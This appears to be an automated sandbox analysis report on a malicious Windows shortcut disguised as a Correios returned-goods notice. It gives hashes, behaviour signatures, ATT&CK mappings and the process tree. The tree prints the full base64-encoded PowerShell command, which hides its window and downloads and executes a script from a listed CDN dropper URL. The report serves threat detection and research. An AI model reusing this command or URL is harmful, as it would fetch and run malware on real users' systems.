858c09f6032b213e8cb62f48d6ecb7237637e9eea5866973905d6c1f13a81bdf

Analysis

max time kernel
117s
max time network
118s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
13/09/2024, 19:03

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

Mercadoria_Devolvida-Correios-1EI6TV2W.lnk
Size

3KB
MD5

246e74b6fffb9d5994f7f70bb6509b45
SHA1

4b7bdf4808ce987b9f94ea40bdd081217867483a
SHA256

0db8cc27123c8bbd5ae0139980b604c514caeeed51da22d67d440e5369f8be1e
SHA512

178cf1ff0d8213ff94de68f5c1c267d50c3a958126925a2c50a554a29229c6f6834d1bf140fdb9f7168352d068880c7730e047e177496af0a8b57dde62fd8e08

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://1361227624.rsc.cdn77.org/v2/gl.php?aHR0cHM6Ly8xMzYxMjI3NjI0LnJzYy5jZG43Ny5vcmcvdjJ8d3IzMQ%3D%3D%

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2828	powershell.exe
6	2828	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2828	powershell.exe
2828	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2828	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 2560 wrote to memory of 2828	2560	cmd.exe	31
PID 2560 wrote to memory of 2828	2560	cmd.exe	31
PID 2560 wrote to memory of 2828	2560	cmd.exe	31
PID 2828 wrote to memory of 2268	2828	powershell.exe	32
PID 2828 wrote to memory of 2268	2828	powershell.exe	32
PID 2828 wrote to memory of 2268	2828	powershell.exe	32
PID 2268 wrote to memory of 2920	2268	csc.exe	33
PID 2268 wrote to memory of 2920	2268	csc.exe	33
PID 2268 wrote to memory of 2920	2268	csc.exe	33

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Mercadoria_Devolvida-Correios-1EI6TV2W.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:2560
- C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -en YQBEAGQALQB0AFkAUABFACAALQBOAGEATQBFACAAQQAgAC0ATQBFAE0AYgBlAFIAZABlAGYAaQBOAEkAVABpAG8AbgAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABTAGgAbwB3AFcAaQBuAGQAbwB3ACgAaQBuAHQAIABoACwAIABpAG4AdAAgAHMAKQA7ACcAIAAtAE4AYQBtAGUAUwBQAEEAQwBFACAAQgA7AFsAQgAuAGEAXQA6ADoAUwBIAE8AdwBXAGkAbgBkAE8AVwAoACgAWwBzAFkAUwB0AGUAbQAuAGQAaQBhAEcATgBvAHMAdABpAEMAcwAuAFAAcgBvAEMAZQBzAFMAXQA6ADoARwBFAFQAYwB1AFIAcgBlAG4AVABwAFIAbwBDAGUAcwBzACgAKQAgAHwAIABQAFMAKQAuAG0AYQBJAG4AVwBJAE4ARABvAHcASABBAG4AZABsAGUALAAwACkAOwBJAEUAeAAoAE4ARQB3AC0AbwBCAGoAZQBDAHQAIABOAEUAVAAuAHcARQBCAGMAbABJAEUAbgBUACkALgBEAG8AVwBOAGwATwBhAEQAcwB0AFIASQBOAEcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADMANgAxADIAMgA3ADYAMgA0AC4AcgBzAGMALgBjAGQAbgA3ADcALgBvAHIAZwAvAHYAMgAvAGcAbAAuAHAAaABwAD8AYQBIAFIAMABjAEgATQA2AEwAeQA4AHgATQB6AFkAeABNAGoASQAzAE4AagBJADAATABuAEoAegBZAHkANQBqAFoARwA0ADMATgB5ADUAdgBjAG0AYwB2AGQAagBKADgAZAAzAEkAegBNAFEAJQAzAEQAJQAzAEQAJQAnACkA
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2828
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dgfnh0z9.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2268
  - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAD41.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCAD30.tmp"
      4⤵
      PID:2920

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESAD41.tmp

Filesize
1KB

MD5
2470831320701c6fe680596ff96f8df3

SHA1
a5609ba194a758c3238b0a85c5816d09869da72b

SHA256
6fcb733383741b6246e45b8861e56383e5cae7a764e0ee5a56243469d8c5a81c

SHA512
09ff8f0c6114121012fa32ca6cc70cd4f54c42cda2dd3a4e8f54efb5fbe6ca4afb1d223d04b8bcc7f58c39ac28ad80742ff7e9b8dd6c6382227cce582a2e14d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\dgfnh0z9.dll

Filesize
3KB

MD5
dda22865f2996e3a89eff747730e7626

SHA1
aca43e355cdb6674c87bf93d47431d5346527589

SHA256
5a611de8e25ab27c24795a5218b1d40580ac5f15cc9569dd23c339b7b708ece3

SHA512
f9e27c0473b8ba9c72e210e770357e23451f447b678e86047b2a5f045b4964d076a3879caa3cf77273e208a1cc5f80065e068c35e5827a2d46cd9d5d61b2a250

Download Submit
C:\Users\Admin\AppData\Local\Temp\dgfnh0z9.pdb

Filesize
7KB

MD5
d795d261969b91af2a067e681edf7c31

SHA1
f0d1336251d1e0fea7136e7ad191d68f89f572db

SHA256
102a4ed40494e1c2e63482c72812c4fa04cdf41b272636ab7c3667ad291248e8

SHA512
7cd2feb213352d9d2482c51f128159d4c98a318948d984e5c1e8eff58512d682ecaee10931dfd4a1b41990e111b98deb63b179ad3d17da84dcf5c64ccfc1c4ba

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCAD30.tmp

Filesize
652B

MD5
8690ba159b7f1c091b3bc01c832279cc

SHA1
499fe3fd5f03194063ef0e7e062ec98599bf2455

SHA256
0095226392f57ad53f1c0602dc45362e377aa0d16d56af1bf5aef655da7b313c

SHA512
e2599627faf1f518f8c484cc4cea22bfd738cf2dfd3581515d74ba21568b944d1c8c3c2a2661acd338b82acacdd55905d1d055dff89867722d7a7c5a04dca47e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\dgfnh0z9.0.cs

Filesize
187B

MD5
7b0e7177dfbb9edd1c1ef08b4fdfae2f

SHA1
cb11a0252cdad66ec247312ccb7feb46456e52b6

SHA256
6caf22ef995616dc37bec21b2af3aa4597cdad88e00a13de0122db3af4e9a4aa

SHA512
7322be891145e550405917757420aeb513e5689970d34647177b1a79a12c7776d4e49c129b093be9927b46bc7582c0379e0cb520af58d4410ed4c5ef98b4dbfd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\dgfnh0z9.cmdline

Filesize
309B

MD5
cbc060e61c7c78bb9c8597906d776959

SHA1
13d002b925bcbf47348f4d23039fc269205a128c

SHA256
e8807af72f44ca1474ea6c092470e79d4db044b358889ddc52c6740a6d099094

SHA512
23427aa25134e0bc3fe869072114f64fbc758af32bdb4c5b476fbbbf96f004ac4698b7b96bcac2cee64bc96451b1b63d26acca76cbfa80674d2d0fca4ba6bf2a

Download Submit
memory/2828-38-0x000007FEF549E000-0x000007FEF549F000-memory.dmp

Filesize
4KB

Download
memory/2828-47-0x000007FEF51E0000-0x000007FEF5B7D000-memory.dmp

Filesize
9.6MB

Download
memory/2828-45-0x000007FEF51E0000-0x000007FEF5B7D000-memory.dmp

Filesize
9.6MB

Download
memory/2828-41-0x000007FEF51E0000-0x000007FEF5B7D000-memory.dmp

Filesize
9.6MB

Download
memory/2828-40-0x0000000002390000-0x0000000002398000-memory.dmp

Filesize
32KB

Download
memory/2828-57-0x0000000002B60000-0x0000000002B68000-memory.dmp

Filesize
32KB

Download
memory/2828-39-0x000000001B5B0000-0x000000001B892000-memory.dmp

Filesize
2.9MB

Download
memory/2828-60-0x000007FEF51E0000-0x000007FEF5B7D000-memory.dmp

Filesize
9.6MB

Download